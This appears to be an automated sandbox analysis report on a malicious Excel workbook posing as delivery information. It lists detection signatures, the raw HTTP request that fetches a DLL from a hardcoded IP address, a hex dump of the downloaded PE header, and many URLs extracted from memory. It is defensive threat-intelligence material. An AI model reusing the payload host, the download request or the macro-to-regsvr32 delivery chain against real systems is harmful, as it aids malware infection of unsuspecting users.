Analysis Report Delivery_Information_7038598.xlsb

Overview

General Information

Sample Name:	Delivery_Information_7038598.xlsb
Analysis ID:	432152
MD5:	aa12a71a4c31152958b75aa2cc0dd605
SHA1:	1709bd79ab07bc915d19b351a0c6000fafb91d70
SHA256:	201d6c214af9eea64e1882a17b2b14a789c50aa6202192b5474cd890bae4f1bf
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Checks if the current process is being debugged

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Found dropped PE file which has not been started or loaded

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Classification

Signatures

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sat1_0609_2[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: sat1_0609_2[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.4:49747 -> 185.180.199.121:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.4:49747 -> 185.180.199.121:80

Networking:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 17:46:14 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 13:51:29 GMTETag: "62de0-5c4559247da40"Accept-Ranges: bytesContent-Length: 404960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 b6 fb 1c 25 d7 95 4f 25 d7 95 4f 25 d7 95 4f 4a a1 0b 4f 3f d7 95 4f 4a a1 3f 4f a7 d7 95 4f 2c af 06 4f 22 d7 95 4f 25 d7 94 4f 7f d7 95 4f 4a a1 3e 4f 0a d7 95 4f 4a a1 0e 4f 24 d7 95 4f 4a a1 0f 4f 24 d7 95 4f 4a a1 08 4f 24 d7 95 4f 52 69 63 68 25 d7 95 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ed c3 c0 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0a 00 00 7a 01 00 00 8c 04 00 00 00 00 00 c1 73 00 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 06 00 00 04 00 00 c7 7b 06 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 e9 01 00 51 00 00 00 34 e2 01 00 50 00 00 00 00 30 02 00 00 f6 03 00 00 00 00 00 00 00 00 00 00 0a 06 00 e0 23 00 00 00 30 06 00 e4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 cd 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7d 79 01 00 00 10 00 00 00 7a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 41 5a 00 00 00 90 01 00 00 5c 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 c8 39 00 00 00 f0 01 00 00 1a 00 00 00 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 f6 03 00 00 30 02 00 00 f6 03 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9a 1f 00 00 00 30 06 00 00 20 00 00 00 ea 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121

Source: global traffic

Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.cortana.ai
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.office.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.onedrive.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://augloop.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cdn.entity.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cortana.ai
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cortana.ai/api
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://cr.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://directory.services.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://graph.windows.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://graph.windows.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.windows.local
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://management.azure.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://management.azure.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://messaging.office.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://officeapps.live.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://onedrive.live.com
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 020EDADF-4CF2-4A17-8391-1EC74C095F72.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
